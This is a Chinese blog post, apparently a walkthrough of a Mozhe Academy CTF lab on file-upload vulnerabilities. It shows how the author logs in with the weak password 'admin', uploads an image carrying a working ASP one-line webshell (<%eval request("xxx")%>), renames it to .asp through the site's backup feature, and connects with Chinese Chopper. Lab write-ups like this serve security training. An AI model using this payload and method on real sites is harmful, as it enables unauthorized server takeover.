拿webshell的方法之文件备份(墨者WebShell文件上传漏洞分析溯源(第5题))

文件备份拿webshell(asp中很多站仍然存在的致命漏洞)
想要拿到webshell,有很多种方法,今天列举一种方法,一时间没找到什么好的例子,忽然在墨者学院找到了一道题,一起来看看吧。。。


题目.png

就是这道题
我们打开靶场环境

1.png

点开,进入,发现需要管理员才能进去,我们开始尝试进入,

2.png

发现这是一句弱口令,密码admin,轻松进入。。。。。。
进去之后我们看到了这个页面,打开。


3.png

看到下面有个文件上传,我们开始尝试上传文件
asp一句话木马:<%eval request("xxx")%>
随便上传一个jpg文件(必须带有asp木马)之后返回一个路径。我们复制这个路径


4.png

之后文件备份就开始了
6.png

上面的是刚才复制的路径,下面的是我们随便起的名字,因为是asp的脚本,我们索性取asp后缀,点击备份之后,看到返回一个路径,嘿嘿 。。
然后我们访问以下这个路径


7.png

我这个只是什么都没有的一句话改的后缀。你们可以上传图片马,但是访问时千万不要有无效字符

然后我们就可以尝试用刚才创造的webshell来解决这个问题了。
菜刀连接

8.png

在我们可爱的地方找到了这个结果。。。。点开后拿到我们需要的墨者key

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 一、初步认识 1.上传功能:网站上各种可以上传文件,图片的地方可以被用作上传点进行非法上传 2.上传原理:在前端代...
    楠昭阅读 1,857评论 1 11
  • 什么是文件上传漏洞? 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其...
    Smi1e_阅读 25,315评论 0 24
  • 黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。...
    查无此人asdasd阅读 3,865评论 0 3
  • 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直...
    付出从未后悔阅读 1,277评论 0 4
  • 没人扶你的时候,自己要站直,路还长,背影要美!
    馨予777阅读 217评论 0 0

友情链接更多精彩内容